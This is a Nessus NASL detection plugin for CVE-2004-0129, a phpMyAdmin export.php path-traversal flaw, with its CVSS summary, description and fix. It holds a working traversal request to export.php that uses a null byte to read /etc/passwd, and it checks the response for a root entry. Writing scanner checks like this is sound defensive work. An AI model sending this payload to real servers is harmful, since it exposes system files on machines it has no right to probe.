CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
Percentile
86.4%
There is a bug in the remote version of phpMyAdmin that may allow an attacker to read arbitrary files on the remote web server with the privileges of the web user or even execute arbitrary PHP code. Successful exploitation of this issue requires that PHP’s ‘magic_quotes_gpc’ setting be disabled.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(12041);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2004-0129");
script_bugtraq_id(9564);
script_name(english:"phpMyAdmin export.php what Parameter Traversal Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
local file inclusion flaw.");
script_set_attribute(attribute:"description", value:
"There is a bug in the remote version of phpMyAdmin that may allow an
attacker to read arbitrary files on the remote web server with the
privileges of the web user or even execute arbitrary PHP code.
Successful exploitation of this issue requires that PHP's
'magic_quotes_gpc' setting be disabled.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Feb/55");
script_set_attribute(attribute:"see_also", value:"http://sourceforge.net/forum/forum.php?forum_id=350228");
script_set_attribute(attribute:"solution", value:
"Upgrade to phpMyAdmin version 2.4.6-rc1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2004/02/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2004/02/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2004-2022 Tenable Network Security, Inc.");
script_dependencies("phpMyAdmin_detect.nasl");
script_require_keys("www/phpMyAdmin", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80, php:TRUE);
# Test an install.
install = get_kb_item(string("www/", port, "/phpMyAdmin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
dir = matches[2];
u = string(dir,"/export.php?what=../../../../../../../../../../etc/passwd%00");
r = http_send_recv3(method:"GET", item:u, port:port, exit_on_fail:TRUE);
if(egrep(pattern:".*root:.*:0:[01]:.*", string:r[2]))
{
security_warning(port);
exit(0);
}
}